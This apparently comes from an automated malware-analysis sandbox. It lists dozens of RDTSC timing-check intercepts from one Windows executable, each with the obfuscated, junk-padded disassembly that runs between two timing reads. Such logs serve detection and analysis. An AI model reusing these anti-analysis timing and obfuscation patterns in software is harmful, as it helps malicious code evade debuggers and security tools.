Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 583876 second address: 583889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jnc 00007FA4C902634Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 583889 second address: 5838DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 push dword ptr fs:[00000000h] 0x0000000d mov ebx, edi 0x0000000f mov dword ptr fs:[00000000h], esp 0x00000016 mov dword ptr [ebp+12454E29h], edx 0x0000001c mov eax, dword ptr [ebp+122D06E5h] 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007FA4C9084158h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c push FFFFFFFFh 0x0000003e sbb bl, 00000021h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 585789 second address: 5857AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026358h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5838DA second address: 5838E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5857AA second address: 5857B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5857B8 second address: 5857BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5857BC second address: 5857C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5857C0 second address: 5857C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5876D1 second address: 587749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FA4C9026348h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D382Eh] 0x00000029 mov ebx, dword ptr [ebp+122D1BC2h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FA4C9026348h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+122D1938h], edi 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007FA4C902634Fh 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 587749 second address: 58774D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58A853 second address: 58A858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58A858 second address: 58A887 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C908415Ch 0x00000008 ja 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FA4C9084169h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58A887 second address: 58A88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 587878 second address: 58787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58787C second address: 587880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 587880 second address: 587886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 587886 second address: 587907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12483FF4h], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FA4C9026348h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, 00h 0x0000003b mov eax, dword ptr [ebp+122D05D9h] 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FA4C9026348h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b push FFFFFFFFh 0x0000005d mov ebx, edi 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FA4C9026350h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 587907 second address: 58790B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58790B second address: 587911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58A9F5 second address: 58A9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58A9FB second address: 58AA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58AA01 second address: 58AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58AA05 second address: 58AA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 58EBCF second address: 58EBD9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593ECB second address: 593ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA4C9026346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593ED5 second address: 593EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084160h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C908415Bh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593EFA second address: 593EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593EFE second address: 593F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593F0A second address: 593F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026352h 0x00000008 je 00007FA4C9026346h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593F27 second address: 593F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA4C908416Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593AA9 second address: 593ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026352h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 593ABF second address: 593AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA4C908415Ch 0x0000000c jnp 00007FA4C9084156h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 595701 second address: 595719 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5307F8 second address: 530804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA4C9084156h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 596E83 second address: 596E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026355h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 596E9C second address: 596EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 59E3AF second address: 59E3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 59E3B8 second address: 59E3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 59E4B4 second address: 59E4CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C9026352h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A3808 second address: 5A380E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A380E second address: 5A3814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A2AFC second address: 5A2B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FA4C908415Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A3094 second address: 5A30B0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C902634Ah 0x0000000f jne 00007FA4C9026364h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A30B0 second address: 5A30D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084168h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA4C9084156h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A338A second address: 5A3395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA4C9026346h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A34DD second address: 5A34E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4C9084156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A34E9 second address: 5A350A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026352h 0x00000008 jmp 00007FA4C902634Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A365B second address: 5A365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A365F second address: 5A3663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5A3663 second address: 5A366E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 52D1AE second address: 52D1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007FA4C9026346h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB2E7 second address: 5AB2EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB2EC second address: 5AB300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA4C902634Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB300 second address: 5AB309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB309 second address: 5AB30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB30F second address: 5AB313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB313 second address: 5AB317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB317 second address: 5AB345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FA4C908417Ch 0x0000000e push esi 0x0000000f jnl 00007FA4C9084156h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA4C9084166h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5791ED second address: 5791F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5792F5 second address: 579302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA4C9084156h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5796BB second address: 5796C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5796C1 second address: 5796C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5796C7 second address: 57971F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026356h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 22FDD2D1h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA4C9026348h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c call 00007FA4C9026349h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA4C902634Bh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57971F second address: 57972A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA4C9084156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 579825 second address: 57983B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FA4C9026348h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 579EA1 second address: 579F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jng 00007FA4C9084176h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D31E1h], eax 0x00000015 mov dword ptr [ebp+1247979Bh], edi 0x0000001b push 0000001Eh 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FA4C9084158h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov cx, 5F00h 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 579F06 second address: 579F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A2E9 second address: 57A2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A2ED second address: 57A2F7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A2F7 second address: 57A335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA4C9084162h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jnp 00007FA4C908415Ch 0x00000012 lea eax, dword ptr [ebp+1248EDD6h] 0x00000018 mov dx, 9558h 0x0000001c add dword ptr [ebp+12454E29h], ecx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A335 second address: 57A33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A33B second address: 57A3B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA4C9084158h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1248ED92h] 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FA4C9084158h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 nop 0x00000049 jmp 00007FA4C9084162h 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007FA4C9084156h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A3B5 second address: 57A3B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57A3B9 second address: 558617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA4C9084158h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dx, cx 0x00000025 call dword ptr [ebp+122D302Eh] 0x0000002b push edi 0x0000002c pushad 0x0000002d jmp 00007FA4C9084161h 0x00000032 jp 00007FA4C9084156h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 537379 second address: 53737F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53737F second address: 53738F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FA4C9084156h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB917 second address: 5AB91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5AB91C second address: 5AB941 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA4C9084170h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
